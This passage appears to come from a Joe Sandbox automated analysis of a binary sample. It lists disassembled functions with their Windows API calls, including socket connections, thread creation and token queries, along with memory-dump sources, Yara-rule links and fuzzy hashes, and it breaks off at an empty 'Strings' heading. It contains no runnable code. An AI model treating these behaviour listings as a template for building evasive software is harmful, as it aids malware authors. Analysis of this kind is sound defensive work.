                                                                                                                  Function 00E26318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE50E6: _wcsncpy.LIBCMT ref: 00DE50FA
                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,00E260C3), ref: 00E26369
                                                                                                                  • GetLastError.KERNEL32(?,?,?,00E260C3), ref: 00E26374
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00E260C3), ref: 00E26388
                                                                                                                  • _wcsrchr.LIBCMT ref: 00E263AA
                                                                                                                    • Part of subcall function 00E26318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00E260C3), ref: 00E263E0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3633006590-0
                                                                                                                  • Opcode ID: da91e0c841b9099de9029e7bc392929f016690c786c609a8750bd75eec6d9fe2
                                                                                                                  • Instruction ID: 5baa144be056933f2c7bc1abe4873a052694880f242b73e851b0ee024fdb7247
                                                                                                                  • Opcode Fuzzy Hash: da91e0c841b9099de9029e7bc392929f016690c786c609a8750bd75eec6d9fe2
                                                                                                                  • Instruction Fuzzy Hash: 4A210831A052298ADB25EB74BC46FEA33ACEF553A4F506165F045F31D0EBA0D9848A74
                                                                                                                  Function 00E38B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E3A82C: inet_addr.WS2_32(00000000), ref: 00E3A84E
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E38BD3
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00E38BE2
                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 00E38BFE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3701255441-0
                                                                                                                  • Opcode ID: 1fd5c2434ddb71dea5f8ff6b1615df41f0a6a6a88e181f8b37fd71eab9a40b6e
                                                                                                                  • Instruction ID: 627097bbde3f0048b42fab0ff0ee594f2f58794f8b341a1645f80bdf4946ae84
                                                                                                                  • Opcode Fuzzy Hash: 1fd5c2434ddb71dea5f8ff6b1615df41f0a6a6a88e181f8b37fd71eab9a40b6e
                                                                                                                  • Instruction Fuzzy Hash: AE219F317002149FDB10EB28DD49B7EB7E9EF58750F045459F916A7292CEB4A8058762
                                                                                                                  Function 00E38420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • IsWindow.USER32(00000000), ref: 00E38441
                                                                                                                  • GetForegroundWindow.USER32 ref: 00E38458
                                                                                                                  • GetDC.USER32(00000000), ref: 00E38494
                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00E384A0
                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00E384DB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4156661090-0
                                                                                                                  • Opcode ID: 75c60e632fad14fbe31b2f6558e26d255db75031a18aefc22d058b2f65c0e245
                                                                                                                  • Instruction ID: e1153cd757af8581154813a1fb36c93e955031e628e04813a715a945cd5f38c5
                                                                                                                  • Opcode Fuzzy Hash: 75c60e632fad14fbe31b2f6558e26d255db75031a18aefc22d058b2f65c0e245
                                                                                                                  • Instruction Fuzzy Hash: 0C218175B00204AFD700EFA5DD89AAEBBF5EF48341F148479F95AA7251DB70AC04CB60
                                                                                                                  Function 00DFAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00DFAFE3
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00DFAFF2
                                                                                                                  • BeginPath.GDI32(?), ref: 00DFB009
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00DFB033
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3225163088-0
                                                                                                                  • Opcode ID: f8f1f051ac7d515a104e006099060fc540763d69a0e83d07fed6d5de4e8fdb16
                                                                                                                  • Instruction ID: 8e144b7195cdf7000c0ac6e2d644f007bd9cb987b5ee71ef9ecb030f0cb15456
                                                                                                                  • Opcode Fuzzy Hash: f8f1f051ac7d515a104e006099060fc540763d69a0e83d07fed6d5de4e8fdb16
                                                                                                                  • Instruction Fuzzy Hash: 7021A7B0904209EFD7109F56EC447AA7768BB563A5F188256F514F61E0C7B05949CB60
                                                                                                                  Function 00E0217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __calloc_crt.LIBCMT ref: 00E021A9
                                                                                                                  • CreateThread.KERNEL32(?,?,00E022DF,00000000,?,?), ref: 00E021ED
                                                                                                                  • GetLastError.KERNEL32 ref: 00E021F7
                                                                                                                  • _free.LIBCMT ref: 00E02200
                                                                                                                  • __dosmaperr.LIBCMT ref: 00E0220B
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2664167353-0
                                                                                                                  • Opcode ID: 58b90043669b3d91354c2cde667df83b66a416f9957cdeb9cacfa93f194a723b
                                                                                                                  • Instruction ID: 7344ab4bf3fa4ca11cbd052a114d881784a69ebd7392f7448dbeac3924690acd
                                                                                                                  • Opcode Fuzzy Hash: 58b90043669b3d91354c2cde667df83b66a416f9957cdeb9cacfa93f194a723b
                                                                                                                  • Instruction Fuzzy Hash: C5114832204306AFEB10AFE5EC45D9B37E8EF04774B10102DFA54B61D1DB71D89186A0
                                                                                                                  Function 00E1ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E1ABD7
                                                                                                                  • GetLastError.KERNEL32(?,00E1A69F,?,?,?), ref: 00E1ABE1
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00E1A69F,?,?,?), ref: 00E1ABF0
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00E1A69F), ref: 00E1ABF7
                                                                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E1AC0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 883493501-0
                                                                                                                  • Opcode ID: 01f9553b0366f58d9c2258e1b19661d4d925675d2ec4680f520f125c8d6977d4
                                                                                                                  • Instruction ID: 3122b817a74d8857c06c1e9c48241e6eadca58812050429cb8d5dc1321e74ef4
                                                                                                                  • Opcode Fuzzy Hash: 01f9553b0366f58d9c2258e1b19661d4d925675d2ec4680f520f125c8d6977d4
                                                                                                                  • Instruction Fuzzy Hash: D9018170705205FFDB104FA6EC48DAB7BACEF8A3987140429F405E3250D6B1CC84CBA1
                                                                                                                  Function 00E19ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CLSIDFromProgID.COMBASE ref: 00E19ADC
                                                                                                                  • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00E19AF7
                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 00E19B05
                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00E19B15
                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00E19B21
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3897988419-0
                                                                                                                  • Opcode ID: a0a7896fb218d611062a3a8a8f8f3fe3c77ed4cb3722bb141a166c9322769907
                                                                                                                  • Instruction ID: f538508bfe4dd3132bbebb5924a2b0e82f34134b1abef382182c1a9cf0091001
                                                                                                                  • Opcode Fuzzy Hash: a0a7896fb218d611062a3a8a8f8f3fe3c77ed4cb3722bb141a166c9322769907
                                                                                                                  • Instruction Fuzzy Hash: 4D017C76B04205AFDB144F55EC58E9A7AEDEB48395F144024F905F3211D7B0DD849BA0
                                                                                                                  Function 00E27A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E27A74
                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E27A82
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E27A8A
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E27A94
                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E27AD0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2833360925-0
                                                                                                                  • Opcode ID: 5dabfff48c68170192e7c86390d937f06fdf7f1abdd8c6ca075e5134ef3766a6
                                                                                                                  • Instruction ID: 9e1b8645e3da4097e486a845c7e9f74aa4fc0bab2d8e481a1cda4e2d958730cb
                                                                                                                  • Opcode Fuzzy Hash: 5dabfff48c68170192e7c86390d937f06fdf7f1abdd8c6ca075e5134ef3766a6
                                                                                                                  • Instruction Fuzzy Hash: 52016D71D09629EFCF00AFE6EC49ADEBB78FB09361F400446D542B2150DB70965487A1
                                                                                                                  Function 00E1AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E1AADA
                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E1AAE4
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E1AAF3
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00E1AAFA
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E1AB10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 47921759-0
                                                                                                                  • Opcode ID: c874e654707a22081d50cd6ed6878ed1b536f96f0c4945211f58f9623200a511
                                                                                                                  • Instruction ID: 9ee3c2df64d9412b4ad0412d013c6d0c5237db3a99b07a9e7248f0604c842c1d
                                                                                                                  • Opcode Fuzzy Hash: c874e654707a22081d50cd6ed6878ed1b536f96f0c4945211f58f9623200a511
                                                                                                                  • Instruction Fuzzy Hash: 8FF044717492446FDB111FA6FC88EB73B6DFF46794F440029F541E7150C6A198458A61
                                                                                                                  Function 00E1AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E1AA79
                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E1AA83
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E1AA92
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00E1AA99
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E1AAAF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 47921759-0
                                                                                                                  • Opcode ID: d4931f5efc14a9b70ad9096b57b061a7a9077cd552f118d4be6326ef96fba086
                                                                                                                  • Instruction ID: 8d669eb913f96ad7bd88be4a8a7a13df9dba2b6985a80c9bc996a4946c162bf0
                                                                                                                  • Opcode Fuzzy Hash: d4931f5efc14a9b70ad9096b57b061a7a9077cd552f118d4be6326ef96fba086
                                                                                                                  • Instruction Fuzzy Hash: 6DF0AF31306204AFEB101FA6AC88EB73BACFF4A798F440029F901E7190DAA19C45CB61
                                                                                                                  Function 00E1EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00E1EC94
                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E1ECAB
                                                                                                                  • MessageBeep.USER32(00000000), ref: 00E1ECC3
                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00E1ECDF
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00E1ECF9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3741023627-0
                                                                                                                  • Opcode ID: 8ee035ce4c45676d337ce91a93086a242683cf90e75513796f8d61da90e4ad30
                                                                                                                  • Instruction ID: 02babb3732935152240484f19daad7b3b9e0473fea031e683e9e36e02917491e
                                                                                                                  • Opcode Fuzzy Hash: 8ee035ce4c45676d337ce91a93086a242683cf90e75513796f8d61da90e4ad30
                                                                                                                  • Instruction Fuzzy Hash: 00016230A047459BEB245B11EE4EBD6B778FB10745F441559F943715E0DBF0A9888B90
                                                                                                                  Function 00DFB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EndPath.GDI32(?), ref: 00DFB0BA
                                                                                                                  • StrokeAndFillPath.GDI32(?,?,00E5E680,00000000,?,?,?), ref: 00DFB0D6
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00DFB0E9
                                                                                                                  • DeleteObject.GDI32 ref: 00DFB0FC
                                                                                                                  • StrokePath.GDI32(?), ref: 00DFB117
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2625713937-0
                                                                                                                  • Opcode ID: 28a9d8d81817f0485b3a30ee58d49f13b4331a224372643c1030fbe526a44501
                                                                                                                  • Instruction ID: 69fd91729b531045d93f21cdabb05a60181dd2257368e037b5b97c8c6215d847
                                                                                                                  • Opcode Fuzzy Hash: 28a9d8d81817f0485b3a30ee58d49f13b4331a224372643c1030fbe526a44501
                                                                                                                  • Instruction Fuzzy Hash: B7F01934108608EFCB219F66EC0C7653B65AB5A3B2F488355F525A40F0CB70996ACF20
                                                                                                                  Function 00E2F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00E2F2DA
                                                                                                                  • CoCreateInstance.COMBASE(00E6DA7C,00000000,00000001,00E6D8EC,?), ref: 00E2F2F2
                                                                                                                  • CoUninitialize.COMBASE ref: 00E2F555
                                                                                                                  Strings
